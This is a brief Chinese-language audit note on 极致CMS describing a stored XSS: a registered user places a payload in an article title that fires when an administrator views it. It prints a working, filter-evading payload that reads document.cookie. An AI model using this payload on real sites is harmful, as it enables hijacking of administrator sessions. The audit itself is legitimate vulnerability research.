登录管理员添加模块
注册用户
点击发布文章
在文章标题处插入xss payload
<details open ontoggle= confirm(document[`coo`+`kie`])>
当管理员访问时XSS成功
极致CMS代码审计